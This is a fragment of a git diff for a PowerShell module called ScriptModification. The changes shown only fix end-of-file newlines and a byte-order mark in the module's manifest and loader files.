Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
-}
\ No newline at end of file +}
diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1 index 7393c29..d326c12 100644 --- a/ScriptModification/ScriptModification.psd1 +++ b/ScriptModification/ScriptModification.psd1 @@ -1,4 +1,4 @@ -@{
+@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'ScriptModification.psm1'
@@ -85,4 +85,4 @@ FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-Compressed # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
-}
\ No newline at end of file +}
diff --git a/ScriptModification/ScriptModification.psm1 b/ScriptModification/ScriptModification.psm1 index 5bb81d3..81d3818 100644 --- a/ScriptModification/ScriptModification.psm1 +++ b/ScriptModification/ScriptModification.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} |